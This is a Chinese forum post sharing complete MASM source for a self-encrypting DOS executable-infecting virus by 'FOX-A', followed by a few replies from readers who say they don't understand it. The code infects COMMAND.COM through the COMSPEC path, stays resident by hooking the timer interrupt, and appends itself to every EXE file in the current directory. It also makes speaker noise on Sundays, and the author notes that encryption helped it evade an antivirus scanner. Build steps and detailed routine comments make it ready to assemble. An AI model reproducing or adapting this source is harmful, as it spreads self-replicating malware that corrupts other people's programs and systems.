
一个用汇编语言写的小病毒源代码

一个用汇编语言写的小病毒源代码

文章作者:FOX-A
;警 告:仅供技术交流,使用者风险自负.若有其他用途,概与本人无关.万一有转贴,请保持完整性,多谢!
;---The Virus Program Information------------------------------
;
;maker FOX-A
;finish 2000.9
;
;make a file name:fox.asm
;microsoft Assembler:masm fox
;microsoft Link:link fox
;
;Warning:This virus code must run in win95/98/me (make sure there is an autoexec.bat
;     or config.sys in the c: root). The virus only infects MZ files of DOS.
;
;1)After assembling and linking, run the program for the first time: the virus will infect the file
; COMMAND.COM and then produce some error, only on this first run.
;2)Then you restart your computer again.when the system run the file COMMAND.COM
; the Virus code will keep in memory.
;3)When you run a DOS program in windows,the virus will infect all MZ file in the
; directory,and mark the file time is 5:49.27.
;4)When you start MS-DOS MODE in Windows,the virus will lock in memory.
;5)If the date is Sunday and you are in Windows, the virus will make some sound every
; 8 minutes, all day.
;6)When an infected file is run, it checks whether COMMAND.COM is already infected
; and infects it if not, so that it can spread to another computer.
;7)At first time it will found by KV3000,after my encrypt,the KV3000 can find me now.
;8)My Virus use a code smsw ax to check the system is run in Protect Mode or Real Mode.
;--------------------------------------------------------------
;some const data for program
    ;encrypt_leng: size of the region encrypt_start_here..encrypt_until_here in 16-bit
    ;WORDS, minus one.  It is the loop count of the decryptor at `start` (one
    ;`sub cs:[bx],ax` per word, bx stepping by 2); infect_exe stores it into `long`.
    ;The original "is byte" remark is misleading - the /2 makes it a word count.
    encrypt_leng=(encrypt_until_here-encrypt_start_here)/2-1   ;word count for the decryptor loop
    ;virus_leng: the whole image appended to a host, `start`..`the_end`, in bytes.
    ;install_virus reserves virus_leng/16+1 paragraphs for the resident copy and
    ;infect_exe writes virus_leng/16+1 sixteen-byte blocks.
    virus_leng=the_end-start
code segment
assume cs:code,ds:code
;Analyst summary (everything below is established by the code in this file):
; - Appending MZ infector.  infect_exe patches the host header so that CS:IP lands on
;   `start` (offset 0 of this segment) with SP=0FFFFh, rounds the file up to a
;   512-byte page and appends this image there.
; - Everything from encrypt_start_here onward is stored in the host with a 16-bit key
;   added to every word; only the decryptor stub below plus `long`/`key` are plain.
; - Residency is an INT 1Ch (timer tick) hook installed by install_virus; BOOT_virus is
;   the handler.  An existing copy is recognised by the first word of that handler, 802Eh.
; - Infected files are stamped with DOS time 02E3Bh (hour 5, minute 49, 2-second field 27,
;   i.e. 5:49:54 as displayed); infect_exe skips files that already carry this stamp.
start:                         ;MAIN PROGRAM START - entry for the dropper build and for every infected host
    ;---uncoil the virus code----------
    ;Decryptor stub.  Restores [long] words in place starting at encrypt_start_here by
    ;subtracting [key] from each (the code segment is writable under real-mode DOS).
    ;[long] and [key] are overwritten by infect_exe when a host is infected, so the
    ;stub itself is the only invariant plaintext of an infected file.
mov cx,cs:[long]               ;cx = number of words to decode
    mov bx,offset encrypt_start_here
    mov ax,cs:[key]             ;key for uncoil (per infection; taken from the clock)
uncoil_again:
    sub cs:[bx],ax              ;word -= key
    add bx,2
    loop uncoil_again
    ;------------------------------
    jmp next                    ;hop over the two data words embedded in the code stream
    long dw 1                   ;decryptor word count (set to encrypt_leng by infect_exe)
    key dw 0                    ;decryption key (set by infect_exe)
next:
encrypt_start_here:             ;from here to encrypt_until_here is stored encoded in the host
    ;----------------
;#######################################################
;MAIN START$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    call save_register     ;save the working registers (bp,si,di,ds,es) the host expects back
    call get_ready       ;get ready to run virus: ds=cs, record PSP and InDOS pointer, clear flags
    call work_out_cs_ss   ;work out the host's cs and ss for this load address
    call infect_system     ;infect system: locate the COMSPEC file and infect it
    call install_virus     ;install virus in memory: go resident and hook INT 1Ch (unless already present)
    call restore_register   ;restore the working registers
    call jump_to_exe     ;jump to Host: switch to the host's SS:SP and far-jump to its entry
;MAIN END$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
;#######################################################
jump_to_exe proc near
;Purpose: hand control to the host program.  Called last from `start`; never returns.
;Requires: work_out_cs_ss has filled the *_in_RAM words.
;Interrupts are masked only while SS and SP are swapped so no interrupt sees a
;half-switched stack.  The data words below live inside the proc, in the encoded
;region, so the host's original header values travel with every copy of the image.
    cli               ;restore ss:sp
    mov ss,cs:exe_ss_in_RAM
    mov sp,cs:exe_sp_in_RAM
sti
    jmp cs:exe_entry_point_in_RAM   ;--->>> Host: far jump through the dword below (ip, then cs)
    ;NEW DATA---------------
    exe_entry_point_in_RAM label dword     ;dword overlay of the next two words
          exe_ip_in_RAM dw ?               ;host IP (copied from the header)
          exe_cs_in_RAM dw ?               ;host CS relocated to this load address
          ;-------------------------
          exe_sp_in_RAM dw ?               ;host SP (copied from the header)
          exe_ss_in_RAM dw ?               ;host SS relocated to this load address
;-------------------------
          exe_cs_in_HEAD dw ?              ;header CS of the host before infection (captured by infect_exe)
          exe_ss_in_HEAD dw ?              ;header SS of the host before infection
          exe_ip_in_HEAD dw ?              ;header IP of the host before infection
          exe_sp_in_HEAD dw ?              ;header SP of the host before infection
      virus_cs_ss_in_HEAD dw ?             ;CS/SS paragraph written into the infected header: where this image sits relative to the load module

jump_to_exe endp
;######################################################
save_register proc near
;Purpose: push bp,si,di,ds,es underneath the caller's return address so the host
;receives them unchanged; restore_register pops them in the reverse order.
;The return address is popped into ax first and pushed back last, because the
;saved registers must sit below it for the final `ret` to work.
;Clobbers: ax.
    pop ax           ;pop ip for ret
    push bp
push si
push di
push ds
push es
    push ax           ;push ip for ret
    ret
save_register endp
;--------------------------------------------------------
restore_register proc near
;Purpose: undo save_register - pop es,ds,di,si,bp (reverse push order) from
;beneath the return address.  Must be paired with exactly one save_register
;and nothing may remain pushed between the two calls.
;Clobbers: ax.
    pop ax             ;pop ip for ret
    pop es             ;restore the regs
pop ds                 ;same order as pushed, reversed
pop di
pop si
pop bp
    push ax           ;push ip for ret
    ret
restore_register endp
;-------------------------------------------------------
get_ready proc near
;Purpose: establish the addressing and flags the rest of the image relies on.
;Sets ds=cs, records es into MCB (DOS enters an EXE with es=PSP, so this is the
;PSP segment; install_virus uses MCB-1 as the program's memory-control block),
;and records the address of the DOS InDOS flag for BOOT_virus.
;Clobbers: ax, bx, es.
    mov ax,cs           ;make sure ds=cs
mov ds,ax
    ;-----------------------------                 
    mov MCB,es         ;PSP segment, kept for the memory cut in install_virus
    mov ah,34h         ;INT 21h/34h: get InDOS flag address -> es:bx
int 21h
    mov indosseg,es       ;save it; BOOT_virus will not call DOS while the flag is non-zero
mov indosoff,bx
    ;-----------------------------
    mov in_windows,0     ;BOOT_virus latches this once it has seen the PE bit set
    mov in_virus,0       ;BOOT_virus re-entrancy guard
    ret
get_ready endp
;-------------------------------------------------------
work_out_cs_ss proc near               ;here hard to do!!
;Purpose: turn the host's original CS/SS/IP/SP (captured from the MZ header by
;infect_exe, carried in the *_in_HEAD words) into run-time values for this load.
;Invariant: the infected header's CS is virus_cs_ss_in_HEAD and DOS relocates it by
;the load segment, so cs = load_segment + virus_cs_ss_in_HEAD here; every result
;below is load_segment + the host's original header value.
;Clobbers: ax, bx, flags.  Writes the four *_in_RAM words.
;---------------------------------
    cmp exe_cs_in_HEAD,0fff0h         ;work out cs
jz is_psp_exe                          ;header CS 0FFF0h = load_segment-10h, i.e. the host starts in its PSP
      mov bx,virus_cs_ss_in_HEAD
      sub bx,exe_cs_in_HEAD           ;bx = virus_para - host_cs_para
  mov ax,cs
  sub ax,bx                           ;ax = load_segment + host_cs_para
      mov exe_cs_in_RAM,ax
      jmp work_out_cs_ok
is_psp_exe:
      mov bx,virus_cs_ss_in_HEAD
  add bx,10h                          ;PSP is 10h paragraphs below the load module
  mov ax,cs
  sub ax,bx                           ;ax = load_segment - 10h = PSP segment
      mov exe_cs_in_RAM,ax
work_out_cs_ok:
;---------------------------------
    mov bx,virus_cs_ss_in_HEAD     ;work out ss
    sub bx,exe_ss_in_HEAD          ;both arms yield load_segment + exe_ss_in_HEAD;
jb out_code                         ;the split only avoids an unsigned borrow when ss_para > virus_para
mov ax,cs
sub ax,bx
    mov exe_ss_in_RAM,ax
    jmp work_out_ss_ok
out_code:
    mov bx,exe_ss_in_HEAD
    sub bx,virus_cs_ss_in_HEAD     ;work out ss (difference taken the other way round)
mov ax,cs
add bx,ax
    mov exe_ss_in_RAM,bx
work_out_ss_ok:
;---------------------------------
    mov ax,exe_ip_in_HEAD         ;work out ip: offsets need no relocation, copied verbatim
    mov exe_ip_in_RAM,AX
;---------------------------------
    mov ax,exe_sp_in_HEAD         ;work out sp: copied verbatim as well
    mov exe_sp_in_RAM,AX
;---------------------------------
    ret
work_out_cs_ss endp
;######################################################     
install_virus proc near
;Purpose: go memory resident.  Skipped when the INT 1Ch vector already points at a
;copy of BOOT_virus.  Otherwise the program's own memory block is shrunk by
;virus_leng/16+1 paragraphs, the whole image is copied into the freed paragraphs
;directly above it, the block's MCB is re-signed as the last in the chain, and
;INT 1Ch is pointed at BOOT_virus inside that copy.
;Observable artefacts: an INT 1Ch handler whose first word is 802Eh; a program MCB
;signed 'Z' (5Ah) with a virus_leng-byte image sitting just above that block.
;Clobbers: ax, bx, cx, si, di, es, flags; ds is restored to cs on the install path.
    mov ah,35h         ;INT 21h/35h: get interrupt vector 1Ch -> es:bx
mov al,01ch
int 21h
mov bx,es:[bx]         ;first two bytes of whatever handler is installed
    cmp bx,0802eh       ;virus in memory ?  802Eh = bytes 2E 80, the start of `cmp cs:in_virus,0` in BOOT_virus
    jz installed         ;virus had install
    ;-----------------------;CUT MEM BEGIN.
    mov ax,MCB         ;MCB holds the PSP segment; the block's MCB is the paragraph below it
sub ax,1
    mov es,ax           ;es=memory block
                    
mov bx,es:[3]           ;MCB+3: size of the block in paragraphs
    sub bx,virus_leng/16+1 ;new size = old size minus the room the resident copy needs
                    ;bx used to press memory
    mov ax,MCB         ;INT 21h/4Ah: resize block es (= the PSP's block) to bx paragraphs
mov es,ax
mov ah,04ah
int 21h
    jc error_press_mem     ;error: give up on residency

mov ax,MCB
    add bx,ax           ;PSP + new size = first paragraph of the freed region
    mov cuted_mem,bx     ;segment where the resident copy will live

    mov cx,virus_leng     ;copy ds:0..virus_leng (ds=cs, the whole image) to cuted_mem:0
mov si,0
mov di,0
mov es,cuted_mem
cld
    rep movsb           ;move Virus code to cuted memory

    mov ax,MCB         ;re-sign the program's MCB as the last block of the chain
sub ax,1
mov es,ax
    mov es:[0],byte ptr 05ah   ;'Z' = last-block signature; DOS treats it as end of chain, so the freed paragraphs stay untouched
    ;------------------------CUT MEM END.
    mov ds,cs:cuted_mem   ;INT 21h/25h takes ds:dx = new handler; point it into the resident copy
    mov dx,offset BOOT_virus
mov al,01ch
mov ah,25h
int 21h

    mov ax,cs           ;restore ds
mov ds,ax
installed:
error_press_mem:
ret
    ;DATA----------------------------     
cuted_mem dw ?           ;segment of the resident copy
MCB     dw ?             ;PSP segment saved by get_ready (name is historical: MCB-1 is the real MCB)
install_virus endp
;######################################################     
infect_system proc near
;Purpose: infect the command interpreter named by COMSPEC so the image is loaded
;at every boot (file header, step 2).
;Flow: resolve the COMSPEC path -> swap in our own DTA -> FindFirst on that exact
;name (fills fileattr/filetime/filesize in the DTA, attribute mask 0 = normal files)
;-> copy the path into `filename`, which infect_exe opens -> infect_exe -> restore
;the program's original DTA and ds.  The DTA name field only holds a bare name,
;which is why the full path is copied across.
;Clobbers: ax, bx, cx, dx, si, es, flags; ds ends up = cs.
    call find_sys_path_file ;find the sys_file path

    mov ah,02fh         ;INT 21h/2Fh: get current DTA -> es:bx
int 21h
    mov oldDTAseg,es     ;save DTA
    mov oldDTAoff,bx

    mov ah,01ah         ;INT 21h/1Ah: set DTA to our buffer (ds=cs)
    mov dx,offset DTA
int 21h
    ;------------------------
    mov ah,04eh         ;INT 21h/4Eh: FindFirst on the COMSPEC path, cx=0 attribute mask
mov dx,offset sys_file
mov cx,0
int 21h
jc infect_sys_fail
    ;-------------------------
    mov bx,offset sys_file ;copy all 30 bytes of sys_file into filename (both buffers are 30 bytes)
mov si,offset filename
mov cx,30
loop_move:
mov ah,[bx]
    mov [si],ah
add bx,1
    add si,1
    loop loop_move       ;loop move

    call infect_exe       ;infect the interpreter now named in `filename`
infect_sys_fail:
  ;-------------------------
    mov ah,01ah         ;restore DTA: ds:dx = saved segment:offset
    mov dx,oldDTAoff
    mov ds,oldDTAseg
int 21h

    mov ax,cs           ;restore DS
mov ds,ax
infect_sys_exit:
    ret
infect_system endp
;###############################################
find_sys_path_file proc near
;Purpose: copy the value of the COMSPEC environment variable into sys_file.
;Method: PSP+2Ch holds the environment segment; scan it (at most 32 KB) for the
;byte pair 'C','=' - meant as the tail of "COMSPEC=" - then copy the text after
;it, up to and including the terminating NUL, 30 bytes at most.
;Caveat: the match is on "C=" alone, so an earlier variable whose name ends in C
;would be picked up instead; if nothing matches, sys_file keeps its previous bytes.
;Clobbers: ax, bx, cx, dx, si, es, flags.

    mov ah,62h         ;INT 21h/62h: get PSP segment -> bx
int 21h

mov es,bx
mov bx,es:[02ch]       ;PSP+2Ch = segment of the environment block
    mov es,bx           ;es:0 is the environment: "NAME=value",0 ... ,0

    mov ah,'='         ;word pattern: low byte 'C', high byte '=' -> bytes "C=" in memory
mov al,'C'

    mov bx,0           ;es:bx begin point
    mov cx,08000h       ;32kb scan limit

find_1: cmp es:[bx],ax       ;find the point of the path start
    jz finded         ;find it
add bx,1
loop find_1
    jmp no_find         ;no find: sys_file left as it was
finded:
  ;----------------------------
    add bx,2           ;skip "C=", bx now points at the value text
mov dx,0               ;byte counter (not used after the loop)
mov cx,30              ;capacity of sys_file
mov si,offset sys_file
move_1:
mov ah,byte ptr es:[bx]
mov [si],ah            ;store first, then test - the NUL is copied too
add si,1
add bx,1
add dx,1
cmp ah,0
jz move_end
    loop move_1         ;loop move
move_end:
no_find:
ret
    ;DATA----------------------------     
    sys_file db 30 dup(0)     ;COMSPEC path, NUL-terminated when found
find_sys_path_file endp
;######################################################     
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
BOOT_virus proc far
;Purpose: INT 1Ch (timer tick) handler installed by install_virus; runs from the
;resident copy, so cs = cuted_mem.  Far proc, returns with iret.
;Guards: in_virus (re-entrancy), then the DOS InDOS flag (no INT 21h while DOS
;is busy).  The three `db 0fh,01,0e0h` sequences are `smsw ax` emitted as raw
;bytes; only the low three bits of the machine status word (PE, MP, EM) are used:
;  - first tick on which (MSW and 7) >= 3: latch in_windows and exit;
;  - later ticks with in_windows set and (MSW and 7) >= 3: Sunday and minute%8==0
;    -> PC speaker on, otherwise speaker off;
;  - later ticks with (MSW and 7) == 001b exactly: call find_and_infect.
;The author's reading of these bit patterns as "Windows" vs "MS-DOS mode" is his
;own (file header, item 8); the code only tests the bits.
;All registers it touches are pushed/popped; interrupts are disabled for the
;whole body (cli ... sti).
    cmp cs:in_virus,0           ;if in virus?  (2E 80 ... - the word install_virus uses as residency marker)
    jz help_jump_1           
    jmp exit_boot_virus         ;is in virus: re-entered, leave immediately
help_jump_1:     
    mov byte ptr cs:in_virus,1     ;set now is in virus
cli
    push di                 ;save working regs
push si
push ax
push bx
push cx
push dx
push ds
push es

    mov ax,cs               ;make sure ds=cs (the resident copy's segment)
mov ds,ax

mov es,indosseg
mov bx,indosoff
cmp byte ptr es:[bx],0
    jnz dos_busying           ;InDOS != 0: DOS is busy, calling it now would re-enter the kernel
                          
cmp in_windows,1
    jz virus_can_out           ;already latched on an earlier tick

    db 0fh,01,0e0h             ;smsw ax
    and ax,111b               ;keep PE, MP, EM
cmp ax,11b
    jl no_in_windows           ;signed compare: < 3 -> not latched yet
    mov in_windows,1           ;latch; nothing else happens on this tick
no_in_windows:
    jmp exit_virus             ;no windows exit boot virus
virus_can_out:

    db 0fh,01,0e0h             ;smsw ax
    and ax,111b               ;keep PE, MP, EM
    cmp ax,11b
    jl sound_exit             ;< 3: skip the sound logic
;-------------------------------------
    mov ah,02ah               ;INT 21h/2Ah: get date; al = day of week, 0 = Sunday
int 21h
cmp al,0
    jnz no_sound             ;no sunday

    mov ah,02ch               ;INT 21h/2Ch: get time; cl = minute
int 21h
and cl,0111b
    jnz no_sound             ;minute not a multiple of 8

in al,61h
    or al,011b               ;port 61h bits 0-1: timer-2 gate + speaker data -> speaker on
out 61h,al
jmp sound_exit
no_sound:
in al,61h
    and al,011111100b           ;clear the same two bits -> speaker off
out 61h,al
sound_exit:
;-------------------------------------
    db 0fh,01,0e0h             ;smsw ax
    and ax,111b               ;keep PE, MP, EM
cmp ax,1b
    jnz exit_virus             ;infect only when the bits read exactly 001b
    call find_and_infect         ;infect every *.exe in the current directory

exit_virus:
dos_busying:
    pop es                 ;restore regs
pop ds
pop dx
pop cx
pop bx
pop ax
pop si
pop di
sti
    mov byte ptr cs:in_virus,0     ;set now out virus
exit_boot_virus:     
iret
    ;DATA----------------------------     
    in_virus db 0                 ;re-entrancy flag for this handler
indosseg dw ?                     ;InDOS flag address, filled by get_ready
indosoff dw ?
in_windows db 0                   ;latched once the PE bit has been seen set
BOOT_virus endp
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
;######################################################     
find_and_infect proc near
;Purpose: infect every *.exe in the current directory of the current drive.
;Called from BOOT_virus (timer-tick context, after the InDOS check).
;Does nothing when the current drive is A: (al=0 from INT 21h/19h).
;FindFirst/FindNext fill the DTA (fileattr, filetime, filesize, filename) that
;infect_exe reads; the program's original DTA is saved and restored around them.
;Clobbers: ax, bx, cx, dx, es, flags; ds ends up = cs.

    mov ah,19h         ;INT 21h/19h: get current drive -> al (0 = A:)
    int 21h
    cmp al,0           ;is in A:
    jz find_exit       ;leave floppies alone

    mov ah,02fh         ;INT 21h/2Fh: get current DTA -> es:bx
int 21h
    mov oldDTAseg,es     ;save DTA
    mov oldDTAoff,bx

    mov ah,01ah         ;INT 21h/1Ah: set DTA to our buffer
    mov dx,offset DTA
int 21h
  ;------------------------
    mov ah,04eh         ;INT 21h/4Eh: FindFirst "*.exe" (cx = attribute mask, left as the caller had it)
mov dx,offset find_file_exe
int 21h
jc find_end_exe
find_one_exe:
    call infect_exe       ;infect the file the DTA now describes
mov ah,04fh
    int 21h           ;INT 21h/4Fh: FindNext, continues from the search state in the DTA
    jnc find_one_exe     ;until no more matches
find_end_exe:
  ;-------------------------
    mov ah,01ah         ;restore DTA: ds:dx = saved segment:offset
    mov dx,oldDTAoff
    mov ds,oldDTAseg
int 21h

    mov ax,cs           ;restore DS
mov ds,ax
find_exit:
    ret
    ;DATA----------------------------
find_file_exe db '*.exe',0    ;FindFirst pattern
    oldDTAseg dw ?            ;saved caller DTA (shared with infect_system)
    oldDTAoff dw ?
find_and_infect endp
;######################################################     
infect_exe proc near
;Purpose: append the image to the DOS EXE named in `filename`, using the DTA entry
;FindFirst/FindNext left (fileattr, filetime, filesize).  Files whose time stamp is
;already 02E3Bh are skipped.  Steps:
; 1. set attribute 20h (drops read-only/hidden/system), open read/write, read the
;    1Ch-byte MZ header into exe_head;
; 2. save header SP/IP/CS/SS into the *_in_HEAD words; set SP=0FFFFh, IP=0;
; 3. round the size up to a 512-byte page, store the page count at header+4, set the
;    new file size, derive the virus paragraph (size/16 - header paragraphs) and write
;    it as both CS and SS; add 3 pages to the page count, zero bytes-in-last-page;
; 4. only now check the 'MZ' magic; seek to the rounded end; take the clock as `key`
;    and encrypt_leng as `long`; write the plain stub (offsets 0..encrypt_start_here-1)
;    from ds:0, then the rest in 16-byte blocks with `key` added to every word;
; 5. seek to 0, write the patched header back, stamp time 02E3Bh, close, restore attribute.
;Artefacts: size = old size rounded to 512 + appended image; header IP=0, SP=0FFFFh,
;page count grown by 3; time stamp 02E3Bh.  dx is not set before the 57h call, so the
;date field receives whatever dx holds then (presumably offset exe_head from the
;preceding write - TODO confirm), i.e. the date is overwritten too.
;On the "not MZ" and "already infected" exits the handle/attribute are not cleaned up.
;Clobbers: ax, bx, cx, dx, si, flags.  Requires ds=cs.

    cmp filetime,02e3bh   ;if the time is 5:49.27
    jnz help_exe_3   
    jmp error_exe       ;already carries the marker: skip
help_exe_3:
    mov ah,43h         ;INT 21h/43h al=1: set attribute to 20h (archive only) so the file is writable
mov al,1
mov dx,offset filename
mov cx,20h
int 21h

    mov ah,03dh         ;INT 21h/3Dh: open file
    mov al,2           ;for read and write
mov dx,offset filename
int 21h
    jnc help_exe_1      
    jmp error_exe       ;open file error
help_exe_1:   
mov hand_exe,ax

    mov ah,03fh         ;INT 21h/3Fh: read 1Ch bytes (the fixed MZ header) into exe_head
mov dx,offset exe_head
mov bx,hand_exe
mov cx,01ch
int 21h
jnc help_exe_2
    jmp error_exe       ;error
  help_exe_2:
                    ;the data of *.exe head had read to buff_data
mov bx,offset exe_head ;bx = header; fields used: +0 magic, +2 bytes in last page, +4 pages, +8 header paragraphs, +0Eh SS, +10h SP, +14h IP, +16h CS
    ;-----------------------------------------
mov ax,[bx+10h]                   ;save sp
    mov exe_sp_in_HEAD,ax
    ;-----------------------------------------
mov [bx+10h],word ptr 0ffffh           ;change sp=ffffh
    ;----------------------------------------
mov ax,[bx+14h]                   ;save ip
    mov exe_ip_in_HEAD,ax
    ;----------------------------------------
mov [bx+14h],word ptr 0             ;change ip=0000 -> entry at `start`
    ;----------------------------------------
mov ax,[bx+16h]
    mov exe_cs_in_HEAD,ax                   ;save cs
    ;----------------------------------------
mov ax,[bx+0eh]
    mov exe_ss_in_HEAD,ax                   ;save ss
    ;----------------------------------------
mov dx,filesize+2                   ;dx:ax = size from the DTA
mov ax,filesize
add ax,200h                         ;+512 ...
adc dx,0
    mov cx,200h               ;... then /512 -> ax = pages, dx = remainder (discarded)
div cx         ;/
    mov [bx+4],ax             ;save to head   ;*512

mul cx         ;pages*512 -> dx:ax = size rounded up to a page boundary
mov filesize+2,dx           ;new file position where the image starts
mov filesize,ax

mov cx,10h
div cx                      ;ax = rounded size / 16 (paragraphs from file start)
    sub ax,[bx+8h]             ;minus header paragraphs = paragraph relative to the load module
    mov virus_cs_ss_in_HEAD,ax
    ;----------------------------------
    mov [bx+16h],ax           ;new cs
    mov [bx+0eh],ax           ;new ss
    ;----------------------------------
mov ax,[bx+4]
    add ax,3                 ;3 more pages (1536 bytes) declared for the appended image
    mov [bx+4],ax             ;put in memory size
    mov [bx+2],word ptr 0       ;bytes in last page = 0
    ;----------------------------------
    mov ax,[bx]
    cmp ax,05a4dh             ;'MZ' check, done after the buffer edits (nothing written yet)
    jz help_88
    jmp error_exe             ;no exe file (handle stays open on this path)
help_88:
    mov cx,filesize+2           ;INT 21h/42h al=0: seek to cx:dx = rounded end
mov dx,filesize
mov ah,42h
mov al,0
mov bx,hand_exe
int 21h
    ;'''''''''''''''''''
    mov ah,02ch;INT 21h/2Ch: get time; dx = seconds:hundredths becomes the per-infection key
    int 21h
    mov [key],dx                ;patched into the in-memory image (ds=cs), so the plain stub written next carries it
    mov cx,encrypt_leng
    mov [long],cx               ;decryptor word count, likewise

    mov ah,40h               ;INT 21h/40h: write the plain part, ds:0 .. encrypt_start_here-1
    mov dx,0
mov bx,hand_exe
    mov cx,offset encrypt_start_here               ;length of the plain stub
int 21h

    mov si,offset encrypt_start_here
    mov cx,virus_leng/16+1      ;number of 16-byte blocks; si starts at encrypt_start_here, so the
write_again:                    ;last blocks read past the_end - TODO confirm what gets appended there
    push cx

    mov cx,8                    ;copy 8 words into data_buff
    mov bx,offset data_buff
move_again_2:
    mov ax,[si]
    mov [bx],ax
    add si,2
    add bx,2
    loop move_again_2

    mov cx,8                    ;add the key to each of the 8 words
    mov bx,offset data_buff
    mov ax,[key]
add_again:
    add [bx],ax;encrypt with time key
    add bx,2
    loop add_again

    mov ah,40h               ;write this 16-byte block
    mov dx,offset data_buff
mov bx,hand_exe
    mov cx,16               ;block size
int 21h

    pop cx
    loop write_again

    mov ah,42h               ;seek back to offset 0
mov al,0
mov cx,0
mov dx,0
mov bx,hand_exe
int 21h

    mov ah,40h               ;write the patched 1Ch-byte header back
mov dx,offset exe_head
mov bx,hand_exe
mov cx,01ch
int 21h
close_file:
    mov ah,57h               ;INT 21h/57h al=1: set time cx=02E3Bh (dx = date, not set here)
mov al,1
mov bx,hand_exe
    mov cx,02e3bh             ;infection marker checked at the top
int 21h

    mov ah,03eh               ;INT 21h/3Eh: close file
mov bx,hand_exe
int 21h

    mov ah,68h               ;INT 21h/68h: commit - issued after the close, so on an already-closed handle
mov bx,hand_exe
int 21h

    mov ah,43h               ;INT 21h/43h al=1: put the original attribute (from the DTA) back
mov al,1
mov dx,offset filename
mov ch,0
mov cl,fileattr
int 21h

error_exe:
ret
    ;DATA----------------------------     
    hand_exe dw ?                 ;handle of the file being infected
    exe_head db 01ch dup (0)      ;copy of the host's MZ header, patched in place
infect_exe endp
;######################################################     
;       DTA       DTA       DTA
;######################################################     
    DTA label byte                 ;Disk Transfer Area laid out as DOS FindFirst/FindNext fill it
db 21 dup(?)                       ;+00h..+14h: reserved search state used by FindNext
fileattr db ?                      ;+15h: attribute of the found file (infect_exe restores it)
          filetime dw ?             ;+16h: packed time; 02E3Bh marks an already-infected file
filedate dw ?                      ;+18h: packed date
filesize dw ?                      ;+1Ah: size, low word
dw ?                               ;+1Ch: size, high word (addressed as filesize+2)
          filename db 30 dup(0)       ;+1Eh: name; DOS writes a bare 8.3 name, infect_system overwrites it with the COMSPEC path
db 0ch dup (0)                     ;padding
;######################################################     
;######################################################     
    ;----------------
encrypt_until_here:                ;end of the encoded region (see encrypt_leng)
    dw ?                           ;spare word
    data_buff db 16 dup(?)         ;scratch block: infect_exe encodes and writes 16 bytes at a time through it
the_end:                           ;end of the image; virus_leng = the_end - start
code ends
end start                          ;entry point = offset 0 of the segment


收藏`


看不懂,但还是收藏了。。。。。。。


米看懂。。收藏


kan bu看不懂...
